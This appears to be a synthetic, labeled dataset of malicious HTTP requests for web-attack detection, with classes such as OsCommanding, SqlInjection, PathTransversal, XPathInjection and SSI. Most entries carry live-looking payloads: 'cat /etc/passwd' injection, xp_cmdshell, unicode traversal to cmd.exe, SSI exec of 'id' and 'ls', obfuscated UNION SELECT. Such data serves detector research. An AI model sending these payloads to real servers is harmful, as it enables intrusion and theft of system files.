Date: Wed, 07 Jan 09 11:32:03 GMT
ETag: W/"6nZZgYbWyGMuFSgPS"
Expect: 100-continue
From: pyIBk@eedSVf1mn.cz
If-Modified-Since: Thu, 29 Jan 04 05:22:33 CET
If-Unmodified-Since: Mon, 04 Jan 10 12:16:16 GMT
If-Match: *
If-None-Match: *
If-Range: "nCxfCGMwJU4YXmCtHVp"
Max-Forwards: 6534
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: Digest opaque="rseh"
Range: -5
Referer: /s9orctyh/esNwrey8/368ivdtj/47dX.php3
TE: trailers,trailers,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.9 (compatible; Konqueror/8.8; Open BSD i386; crHuisboe)
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7804x6342
Via: rek/3.4 www.mSe2.js, 2.2 164.223.38.240
Transfer-Encoding: compress
Upgrade: ksu/7.2, ear/3.1
Warning: 494 www.yte1Tn.shtml "iewe" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38585
Start - Id: 43158
class: OsCommanding
GET /tcnYiGYdgwZ/fNnvJ_hOpg/usiHretartz/tear3dloasn2ciEPTal/nW8.znYiGJ/h88.rlU5r@.GBqF4p/s.OsL/s.lO.vnFr/nadsDg9shabphtvfsrn7.php3?z1ctjetc7SJAnetcatf=90008774&Afth=nutowoncns%5Doinsertaynock%26m&oetsdr9teU=qnc7olEnnullnc0%7EhHunioniss&8w=9788&rmhsg3dkena=Wo%26es%3A&RUwmwdhcAios=1lhavingtyie+6rNs&1nresu=nph-r&sje3d=3059&aaoeodyIqEdr=%250a++cat++%250a%2Fetc%2Fpasswd++++%250a&tbene27ochau=+S+yfrnqjon HTTP/1.1
Host: 122.24.39.56
Connection: close
Accept: */*
Accept-Charset: big5
Accept-Encoding: compress;q=0.3, identity;q=0.9, gzip
Accept-Language: *
Cache-Control: max-age=351
Client-ip: 66.158.131.150
Cookie: ZgH15j3d=wOo
Cookie2: $Version="36"
Date: Sat, 14 Jan 06 02:02:56 UTC
ETag: W/"Wm-uQG@VhFKtK.gNS7"
Expect: AioiPj
From: riAeyrh@tgaMea.st
If-Modified-Since: Mon, 17 Dec 07 23:18:12 CET
If-Unmodified-Since: Sat, 02 Jul 05 05:47:30 UTC
If-Match: *
If-None-Match: "UoQL0QEGsw-9tk4lG"
If-Range: Fri, 04 May 07 05:47:31 UTC
Max-Forwards: 0
MIME-Version: 1.6
Pragma: dt='6ol'
Proxy-Authorization: 4lhm thmdu=aoeoa
Authorization: Digest cnonce="r2fn"
Range: -1
Referer: http://www.n0ro3.de/airtqtt.js
TE: deflate;q=0.4,trailers
Trailer: If-Match
User-Agent: Mozilla/9.4 (Windows; U; Win 9x 3.8; h2-ta; rv:6.5.4) Gecko/18059425
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 807x674
Via: FTP/7.3 www.dcnoSnu.html
Transfer-Encoding: compress
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 9.181.32.5
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43158
Start - Id: 35056
class: SqlInjection
GET /mF2tneIoE/A8CixRWK6T/eAvIeqfTn.JEBM_OFq/oQ1t/pcnado7ra2v3xupoyobh/axtStgirboc5/83kvbodqynqfromCp/Gedt.msf?gn92nhmn=i0&IvN8Rmrl=olimmE8toem1tritwL&ste3inse=exec++xp_cmdshell+%27%22g5ddc8bdr%22+%3E%3E++++script.vbs%27&nainhtj1cnDnei4=kinpa&H223hahl7hewo=r62https%2Feb8eem4e+I%3D4s&82B0T2QMecX=tHt&cae=Mq8%2B HTTP/1.0
Host: www.srfdndtuq.st:80
Connection: close
Accept: video/quicktime;q=0.0, application/postscript;q=0.5, application/*;q=0.1
Accept-Charset: iso-8859-15, gb2312, macintosh, iso-8859-1;q=0.7, us-ascii
Accept-Encoding: gzip
Accept-Language: r4caul-htts9;q=0.2
Cache-Control: no-transform
Client-ip: 243.80.185.17
Cookie: retuAIrtqddh9rT=c2i7W4B8;rl=n]1update2Pnunion s[pn];t1n=8pime;nuoP8auaheeanru=9;rixpt9=hp6PW;ee47=121
Cookie2: $Version="16"
Date: Wed, 30 Dec 09 14:30:11 CET
ETag: "WafdUY6zudi3PdKk7Olr"
Expect: 4en1t=spype;iksuo0L=mtJuin
If-Modified-Since: Sun, 08 Mar 09 24:13:04 CET
If-Unmodified-Since: Sat, 16 Dec 06 17:43:27 CET
If-Match: "9ZYLA89ve9xKQ.Kx"
If-None-Match: *
If-Range: Thu, 16 Nov 06 05:57:12 UTC
Max-Forwards: 8726
MIME-Version: 0.3
Pragma: stthou='n'
Proxy-Authorization: PnTt stlaaah0=afAAao6
Authorization: Digest username="rtnn"
Range: -4,7-,2698-
Referer: http://hinaedl.gov/6fto/aiat/giklikd.js
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: edreucsytrEae
UA-CPU: StrongARM
UA-OS: Windows NT
UA-Color: color16
Via: HTTP/2.6 www.lbtfe.js:08
Transfer-Encoding: identity
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 825 www.eezs.png:4813 "dnlyiz8ddawi9eucren" 
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35056
Start - Id: 45349
class: PathTransversal
GET /ahiIhn4nl/e2TP3jaovs3UuJ/hrtorertraut4eafhxh/TB/3icebrwteelata6sE/5@TK/hesc/8MDX95Wprocessing-instructionH3.i/okJgy/s%uO9FsQlsAM.sh?S7window.open2iGEY.l=vvtt04iatsnwy1&78tthtbkOwspm=ismHF%40s7esecsz&9YqstnDc4ajno=8en&zug=eeele&TttTEclRro2soe=2vj2oeAp&sta=ymhswin&BwAO2=+vhn&uiDb02iPyyMu=includees6o&ahb2poemf=smaSn&eiesio=965868&yfumlbitgtOext=iitesn%3A%5B+ms&eshaot=950750 HTTP/1.0
Host: www.aisrmon.net:16845
Connection: rca0e
Accept: */*;q=0.5
Accept-Charset: *
Accept-Language: *
Cookie: nSor0Es=rctt;0ometa_dva=h:\winnt\boot.ini;8Lnhae9i=992948921
Date: Sun, 21 Jan 07 20:55:03 UTC
Expect: tioojux=3utrTa
If-Unmodified-Since: Fri, 23 Apr 10 12:49:06 GMT
Referer: http://www.lotalstr.net/KscPs/eLBn.ace
User-Agent: OrhbuP/1.9
Via: 0.8 www.issm7.css, HTTP/7.5 www.Snfl.jpeg:82482, 29r/4.7 www.x2f4agr.jpeg:8
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45349
Start - Id: 36530
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 73.250.142.10:80
Connection: keep-alive
Accept: text/*;q=0.0
Accept-Charset: iso-8859-4, windows-1253;q=0.8, x-mac-arabic;q=0.8
Accept-Encoding: 
Accept-Language: ycgseo-Augi7;q=0.3, a-tils
Cache-Control: only-if-cached
Client-ip: 164.144.166.119
Cookie: ts=icakmtrnswhaMwvna;etnaer=dNtmU
Cookie2: $Version="647"
Date: Wed, 11 Feb 09 11:10:34 GMT
ETag: "LTQJBrMswH-A3Q6JK"
Expect: 9nww
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Sat, 02 May 09 13:49:05 UTC
If-Unmodified-Since: Wed, 24 Dec 08 16:44:26 CET
If-Match: "v-9C0a9p1KtEsLo"
If-None-Match: "0RqlRF4b9-CNZsl_q"
If-Range: Sat, 20 Nov 04 20:30:16 CET
Max-Forwards: 2
MIME-Version: 0.9
Pragma: brasxhe='axdna'
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: ebie lqim0=ntd5
Range: 17-
Referer: http://oemhnh.uk/a8ftEreb/sEtIceAc/saEe2.jsp
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 9.5; 3a-ri; rv:2.7.3) Gecko/39137849
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 547x5195
Via: 6.8 www.t6wa5h6E.js, 4.7 244.206.70.132
Transfer-Encoding: gzip
Upgrade: rind/5.0
Warning: 048 www.e6frT.shtml:3476 "eA38Htn4cp4sefaeTVr" 
X-Forwarded-For: 150.134.65.172
X-Serial-Number: 212561
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36530
Start - Id: 48754
class: XPathInjection
GET /Hs1Key/and70e3QRRhBJkjaJ/uQPDnW0atZ5IltmpJP/be6ycshagfn0zp2tG/ls7/eeeebe/niSoeretetosnNsme/hNjg-isLl@PQmm6xX.jpg?eA=we%2Fiece%2FiaiOna%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D32%5D+or+++%27usaceo%27+++%3D++++%27 HTTP/1.0
Host: 37.144.48.94
Connection: NlQre
Accept: application/x-tar;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.8
Accept-Language: xi-VE10i8h;q=0.1, mans-c;q=0.6, hg1-ee3nb;q=0.9
Cache-Control: no-transform
Client-ip: 7.62.30.104
Cookie: 3YOhupdatesqarLZ=ee texrlSOoHvd;trGr0stdp=eid1
Cookie2: $Version="094"
Date: Tue, 15 Mar 05 12:01:53 CET
ETag: W/"UE8zeFk_uitRh5X7DiJ-"
Expect: 100-continue
From: 2thchRa@mEq7atat.cz
If-Modified-Since: Mon, 17 Jul 06 04:05:22 GMT
If-Unmodified-Since: Sat, 18 Sep 04 02:51:31 GMT
If-Match: *
If-None-Match: "vul-SnuSJuwDJ@dJU"
If-Range: "gej4gF6yO.Xbhg4"
Max-Forwards: 779
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://is55.st/Tmradind/rpos/lestr.pl
Authorization: Digest cnonce="fEhiol"
Range: -9
Referer: /Eseots.jpeg
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Unmodified-Since
User-Agent: as2eene (pE_jzl0; i9zxs4I0)
UA-CPU: MIPS
UA-Disp: 132,229,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0470x877
Via: ntl/9.4 www.4T1g3erb.htm, FTP/0.0 www.tiRJcs.jpg
Transfer-Encoding: gzip
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 803 11.197.109.145 "LruslrncTctzsslyIpro" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48754
Start - Id: 40215
class: SSI
PUT /l7p8OL32bNbpr/nLylXR@AR/llqj4WFznB1rjkPJKY-/ntKsobos5eidprohe/bfrommpmautoexeceryt.swf? HTTP/1.1
Content-Length: 173
Content-Language: TrlSTa2n
Content-Encoding: compress
Content-Location: /m9nhe/ctiqmy.mp3
Content-MD5: dDNzZHRTbzFzSXJndHZyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Jan 08 12:10:40 GMT
Host: www.u7dsia.uk:493
Connection: gtt2
Accept: image/gif
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *
Cache-Control: O=lel2uiS
Cookie: snee1jtlait=oSv-Hth5;iasys=548;b1=<!  #<!--#exec    cmd="id"-->;TI1j=37315;o3r950rtrafe6wn=92126138;nenAnEt4=d7eVCTY_
Cookie2: $Version="15"
Date: Wed, 27 Sep 06 06:34:18 UTC
ETag: "S6WzxILFWwTb2Ut8o._"
From: hs0teHen@ru4d.net
If-Modified-Since: Fri, 29 Apr 05 11:14:44 GMT
If-Unmodified-Since: Sat, 10 Dec 05 15:47:37 UTC
If-None-Match: "QrpWm@SUDxcZpYsn"
If-Range: *
Max-Forwards: 7
MIME-Version: 1.0
Pragma: no-cache
Authorization: Digest nc=b03edfbd
Referer: http://www.e1itiIu.net/eaye/twa8/3hiiruha.asp
TE: trailers,deflate;q=0.2
Trailer: Connection
User-Agent: Mozilla/2.5 (Machintosh; U; Mac OS X 4.4; e2-aE; rv:9.9.5) Gecko/55898695
UA-CPU: StrongARM
UA-Disp: 0733,7918,8
Via: FTP/2.7 123.18.57.166, 8eaon/6.7 174.205.185.193, FTP/4.3 159.25.247.187
Upgrade: cEOtae/0.3
Warning: 352 www.rt0dic.htm:27 "iOefoiwpe5htYvn" "Fri, 11 May 07 16:23:26 UTC"

td=l&vj91P=3736515&agr0hpe1=cbgOjJu7eP&iDwhere9c@WKwindow.open=nepasecsl&srrHaEinassnd=oEldH&hsej6pwp8atgh=o@ojVzOYn&AhO=ebt?&smftly0en=R1)e0&uo9ei=tco&uieb=)xhcnsrr

End - Id: 40215
Start - Id: 40469
class: SSI
GET /g6OwIVJvB5Re@cPepOa.css?tdeei3uLHas7=q3%40ARLn&greceyhtrZ=mg&xajedahCbnt=l-PpwpKCN2&ond6=+&urbbisEt=itlNraetU&cEqstieug=gt2&vwCJselectFlR6t=9426850424&1ccd=49706948&csotldnBnnoah=%3C%21--+++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&arhuoopc4nsl=location%3Bc4eireohen HTTP/1.1
Host: www.wider.cz
Connection: esiir
Accept: */*
Accept-Charset: x-mac-hebrew, x-mac-arabic
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 31.84.234.92
Cookie: 7poRla56si=88277634
Cookie2: $Version="386"
Date: Sun, 10 Sep 06 06:02:41 GMT
ETag: W/"fAWBVr05qijQem_WNf"
Expect: gCixb
From: Yma7@5eefcOthto.biz
If-Modified-Since: Mon, 05 Jun 06 17:38:05 GMT
If-Unmodified-Since: Mon, 29 Jan 07 13:32:05 UTC
If-Match: "CcRcwWICreg72Di0"
If-None-Match: *
If-Range: Mon, 28 Jan 08 08:44:02 UTC
Max-Forwards: 9
MIME-Version: 6.5
Pragma: sgerTp=ansolnO
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Basic Nm55ejprYm9lc2w=
Range: 6740-758,0802-
Referer: /esS9d/Hrin4/mdai/jOTna/eehh.aspx
TE: gzip;q=0.1
Trailer: Date
User-Agent: ss4gVetsengn6dere
UA-CPU: PowerPC
UA-Disp: 0480,927,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 025x185
Via: HTTP/6.0 www.rCsen.jpg, ceone/7.8 www.bsounii.png, 7.8 www.eaSn7e.css
Transfer-Encoding: AflaI
Upgrade: euiyir/6.1, hfa8er/9.8, bIRueh/1.1
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40469
Start - Id: 41432
class: SqlInjection
PUT /eICZVLrGPg7k7uH/nlF7lHC@g@zn1/scCL6AzNHNZqW2vk4eys/KcP_hE.ReR/l5VTyQL0/4F3W0zOcatQekjW.jpeg? HTTP/1.0
Content-Length: 202
Content-Language: yntt,watea1
Content-Encoding: deflate
Content-Location: /elai/ianl/V7atd/nactX/ffve.pdf
Content-MD5: YWFzd3h0c3llcmlSd21pcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Aug 07 12:11:03 UTC
Last-Modified: Wed, 12 Apr 06 18:13:23 CET
Host: www.70he.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 196.211.227.198
Cookie: rtbh19h=8351;drrhe2n7tstghh=anouig;taNhiotalNwtno=hzb3 m5systemDu=2dt;et8=e rsiealtdocumentw;rrfedeiwimyhb=6329
Cookie2: $Version="458"
Date: Fri, 22 May 09 09:51:13 CET
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: enoavte1=egee
From: m7bmf@6ittvesi.net
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Fri, 17 Aug 07 13:50:37 GMT
If-Match: *
If-None-Match: "Ub1oI.0Bnjqt9.p16"
If-Range: *
Max-Forwards: 820
MIME-Version: 0.4
Pragma: eVeccvh='tyavS4t0'
Proxy-Authorization: Digest qop=ymsaBhdy
Authorization: Digest qop=4eBn
Range: -86
Referer: http://th8eq.net/ioEet/c9nc/90leorxr.cgi
TE: deflate;q=0.2
Trailer: Date
User-Agent: palRekot/5.5.9
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x118
Via: 8ep/9.3 165.94.165.5, 5.4 www.mxotm.gif:18090, oupu/2.5 www.tHmahw7t.tiff:96
Transfer-Encoding: deflate
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

amsS=;    EXEC(  'UNI'+'ON'+'   '+'SEL'+'ECT         'TOty',1,26028,'noboed',9     FROM  i6o5N)&zar=ycEheepeboot.iniRd&dc0ee5umtha=nidbB&sysptNyeWfrllnn=o

End - Id: 41432
Start - Id: 46427
class: PathTransversal
GET /9YDaAfzRz3ZGwLls/odq.eK@jVOq6g.htm?XKdeleteH=mH6ortp8&YFnodeiafo=tin&ittmaeOr5ltufly=tePanRfo&4EsHG=rv%22bgsoundnole6cs%22e&shnAsdvhwH6=hUR2nG786&ae=hb%3FeiframeeA%2B+qhEaahes&0nstersfy=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&bhplronfo=oiqZ&ZjdCqzO=t%28%3E6a+eRovbscript%3Dwne%3B&rofiehRiErpco4=oedr+tmotsobjectftph+s&oAtiaeasepehoot=605 HTTP/1.1
Host: 112.104.111.98
Connection: knss
Accept: application/*, text/*;q=0.5, video/*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: ne-A;q=0.2, p-enee7nO;q=0.8
Cache-Control: no-cache
Client-ip: 124.211.79.221
Cookie: uy=r2vIA;frdth=em;yLVbmmail07=6;c5bzb@httpo7=wdtfIAswonrdsdnace;7hdnsm=je0;@NconnectExBF=KooiaLh
Cookie2: $Version="221"
Date: Mon, 05 Feb 07 03:29:29 CET
ETag: W/"wObv.Rp4nci60BE"
Expect: rgnRrl
From: ore8y@Ydkeykr.uk
If-Modified-Since: Sun, 06 Sep 09 02:42:42 UTC
If-Unmodified-Since: Tue, 16 Jan 07 09:43:23 CET
If-Match: "2_kVc71@vZG-axyX7uXB"
If-None-Match: "fzHackZ@wH13hnzB"
If-Range: "oY.MRtACTt1v6CSmHV"
Max-Forwards: 536
MIME-Version: 3.3
Pragma: 3a=rreu0
Proxy-Authorization: Digest nonce
Authorization: iaObhc sAeoin=aw9lo
Range: 3341-,1-,7-
Referer: http://hodu1q.fr/nHF7aia/4Rbey8Wa/EaLnO.php
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/8.9 (Windows; U; Windows NT 6.4; l1-qs; rv:2.9.6) Gecko/80257444
UA-CPU: x86
UA-Disp: 5419,5549,32
UA-OS: Windows 98
Via: tco/4.2 www.anNeeU.js, FTP/7.6 www.xnund.tiff, yneiA/1.4 66.253.106.71:056
Transfer-Encoding: gzip
Upgrade: ownrn/1.4, lmrs/5.6, aatus4/6.8
Warning: 223 232.197.120.51 "npays3" "Wed, 14 Jun 06 02:27:53 UTC"
X-Forwarded-For: 242.103.195.112
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46427
Start - Id: 45214
class: PathTransversal
GET ////? HTTP/1.0
Host: www.fisAe.cz:7
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.3, deflate, deflate, identity, gzip;q=0.1
Accept-Language: *
Cache-Control: max-stale
Client-ip: 115.213.88.73
Cookie: m4ZJ=08156;sutgAsgrb10a=isdUegs;sskiaih=46;seh1=ba%Saeitp9OeZR;9uiyleeroFa=octehea0dactaow;svltwna=17747
Cookie2: $Version="5"
Date: Wed, 20 Aug 08 07:36:05 GMT
ETag: W/"_42@pBjVbX4bYLjRIkl"
Expect: EEer
From: 1p4rry@estl2a.org
If-Modified-Since: Tue, 21 Feb 06 05:39:31 UTC
If-Unmodified-Since: Thu, 09 Mar 06 19:57:03 GMT
If-Match: "l.vX.hJEasDfI8kBDA"
If-None-Match: "ql1LzEgDmoYabfZ.U"
If-Range: Fri, 07 Sep 07 22:02:20 CET
Max-Forwards: 672
MIME-Version: 3.6
Pragma: dicabtb='acqng8'
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM b2VkTGlueWVDV29hckVFYW5oMmV1OTFhdGRjYVJwZVNhYmVqNGF1ZQ==
Range: 223066-,90-340647
Referer: http://Ht3rsdn.it/ewiw9at/oaalin.sh
TE: trailers
Trailer: Expect
User-Agent: Mozilla/3.7 (X11; U; Unix 5.5; nW-go; rv:5.9.9) Gecko/64678383
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2272x045
Via: 7.2 45.215.107.150, 7.3 www.malxpn.png, HTTP/3.1 www.ohul.png:305
Transfer-Encoding: to2uw
Upgrade: botOA/6.4, hiei4a/3.6, u8Qat/8.0
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 254.23.68.104
X-Serial-Number: 706890452941318
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45214
Start - Id: 39377
class: SSI
GET /QinputuvwzHphpfpaTX/elAcR2pqccvo/nsrtCqset.cfm?Fe56K6samlikeYA=iDa0we0w&I3ller7rowrswt=io2cch&dtthsooDoaDddu=ane3rrg7naIacnlojH&s4=%3C%21--%23email+fromhost%3D%22www.shhmohao.com%22+tohost%3D%22mailbox.tau1.com%22+message%3D%22Wkyris+neoTh4g+sgeoa+ohh%22+fromaddress%3D%22tsgS.com%22+toaddress%3D%22rTu.nanb.com%22+subject%3D%22yrT%22+sender%3D%22esf.com%22+replyto%3D%22oftar.com%22+cc%3D%22aSuh%22+inreplyto%3D%22xaim+fkeg+iti%22+id%3D%22rxmail%22+--%3E&pVkWG=94464117&Q5HHuOQK8=oQgh&aeosIHb=Uao HTTP/1.0
Host: 147.126.61.78:8
Connection: close
Accept: text/xml;q=0.5, audio/*;q=0.7
Accept-Charset: euc-kr;q=0.5, windows-1252, windows-874;q=0.8
Accept-Encoding: 
Accept-Language: uuNae6m-ahgne;q=0.5, p3u-ed8;q=0.5
Cache-Control: max-age=91502
Client-ip: 196.184.80.212
Cookie: xhonfh3lWa=owQGP2rYXL7o
Cookie2: $Version="2"
Date: Fri, 16 Sep 05 09:25:53 CET
ETag: "NH0nqaIAQJf.Juk35"
Expect: 100-continue
From: lrS1n@ltwen24wwu.net
If-Modified-Since: Thu, 22 May 08 11:52:37 GMT
If-Unmodified-Since: Mon, 10 Oct 05 12:13:00 GMT
If-Match: *
If-None-Match: "uXL0HQhCfjcdBr8W.hI"
If-Range: *
Max-Forwards: 6
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM N3RGc3RpbGRnanRleWRzUGthc3MwcmVldGlESmo4ck4=
Authorization: NTLM QWNHYXBnNXphZXJuOHJtckdlZFV0Y3lnZFQ2b2MyMnRlZWVzZW5yVHN0bg==
Range: -7403,569103-
Referer: /sssnasa.shtml
TE: gzip;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 1.5; ym-t4; rv:2.5.7) Gecko/60683479
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3402x217
Via: HTTP/4.2 100.28.171.184, FTP/9.2 www.ruhntn5e.jpg, HTTP/1.6 6.19.55.50
Transfer-Encoding: baag
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 979 www.1fezb.jpeg "hlSEv" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39377
Start - Id: 39980
class: SSI
GET /eVL9OkfGjkOMxKPHE/itgfp/tStn/fP/bOW4wZ6B1WcmJe7S9/lib5CPdXmV@exec/u3rpGb/t.YI/seluujlrdasi0rnp.php3?atateaensa5=+0h&pKB6oy=bSzb&DPPC4S=6&Y7WznA4ncILe=ar648nvpsawrAeaxt&m6BdtV=%3C%21--+++%23exec+cmd%3D%22%2Fbin%2Fls+++++-l+++++%2Fhome%2FaluTN%2Fio%22+++++--%3E&@sock_streamA4kg.K=lF44KDR8KK6d&4Ii=%29%7Cw4atnd6eslto HTTP/1.1
Host: www.5sanesaWp6.uk:60
Connection: keep-alive
Accept: video/*, text/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: mrsipgh-t1qfFp, e-e10iese, brtp6ono-kedIAtln, tevhesti-2g;q=0.5, M8-Jtsdah;q=0.7
Cache-Control: 0l7='ohaT0n'
Client-ip: 190.151.22.46
Cookie: oo=ltc&+5sdjspcucdstdin0nsI
Cookie2: $Version="35"
Date: Mon, 01 Feb 10 06:36:07 UTC
ETag: "syLbFXo8hSf7y.nXN"
Expect: 100-continue
From: hmiSezi@the9ciIr.cz
If-Modified-Since: Sat, 30 Apr 05 20:33:05 GMT
If-Unmodified-Since: Mon, 09 Jul 07 03:36:18 UTC
If-Match: "u1YdDrP@zSHRr3Q"
If-None-Match: *
If-Range: Fri, 23 Jan 04 06:53:55 CET
Max-Forwards: 08
MIME-Version: 7.9
Pragma: 0e='tM'
Proxy-Authorization: NTLM cmY4bG55dGl2YXJjb2ZtbWhpdGVhZTFBbWRhbnI5eWhJbXR0dGh0Z29hZWlzUw==
Authorization: Digest response="D6B4C4E88F99caAC3C05Ba6cDa898f9A"
Range: -038647,3950-886928
Referer: http://www.fqrteasR.net/8cmt/rlishe07.php4
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: debvlE677l (eAw_VRbR)
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8811x8791
Via: 6.3 www.truu7.png, 1.2 49.142.20.225:144, 4.3 217.223.66.154
Transfer-Encoding: compress
Upgrade: eto/0.2, rok/5.4, dgyt4O/7.3, hii8/8.4, hooeh/2.3
Warning: 988 144.42.79.118:49591 "sspeenqeLi3zyDee" "Thu, 16 Jun 05 19:34:26 GMT"
X-Serial-Number: 754321
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39980
Start - Id: 35636
class: XPathInjection
GET /edcceuedaaptarge2an/7N_M/scte/ztxDEateqrLAb/daBMWRyVhsO@wfopen.htm?_.sYexec4in=l4ttl&1N@TTkwherepV22=ae9osph8omoi&ia=5fe&tisjxl=d&nj3iiItrn40ps=%28i+%3C+count%28yexn%2Fchild%3A%3Atext%28%29%29+and++j++%3C+count%28Egp%2Fchild%3A%3Acomment%28%29%29++++and+k++++%3C++++count%28tufn7%2Fchild%3A%3A*%29+%29&md7n3qe=dIn&awuaFn=631ntlhesnielesc&Ab=3525816&6vEn=etatceeisuhiee&ahrlrml6rd=uztautoexec+ HTTP/1.1
Host: www.g2eet.gov
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: s5aneace-9H, seoy-ve6, c7-criysl;q=0.4
Cache-Control: no-transform
Client-ip: 71.23.73.207
Cookie: ytbiLqjsrcsh=;)x8s;ldcdcreet=221;rnarwrdnm=sdjKoR;9torctaticNnv=863898146;nthunnsrEh3Ua=zvAroIMU;vrt2=geAlphaving3D
Cookie2: $Version="207"
Date: Thu, 09 Jul 09 11:02:21 UTC
ETag: W/"MtaA7VKLaZIKhkEV"
Expect: 100-continue
From: rzin8cri@efHTe5.be
If-Modified-Since: Sat, 28 Feb 09 12:29:42 UTC
If-Unmodified-Since: Sun, 25 Mar 07 10:31:22 UTC
If-Match: "8R-37HdqyUFXt@uoyd"
If-None-Match: "pdEsscU4Id6hpFPe"
If-Range: Wed, 03 Feb 10 04:29:02 GMT
Max-Forwards: 44
MIME-Version: 1.5
Pragma: h='onEeEth'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: Basic bGVlbnRxOnNvc2U0blI=
Range: -38,162-85,-031
Referer: http://www.tgeonm.gov/eoEi0/iRto/delaoleo/ssqf.mpeg
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/8.7 (compatible; yp0w6sIhre; SunOS sun4u; a0i1o; ci8qIm4n; vIe6)
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 251x7424
Via: FTP/1.7 www.nolik.htm
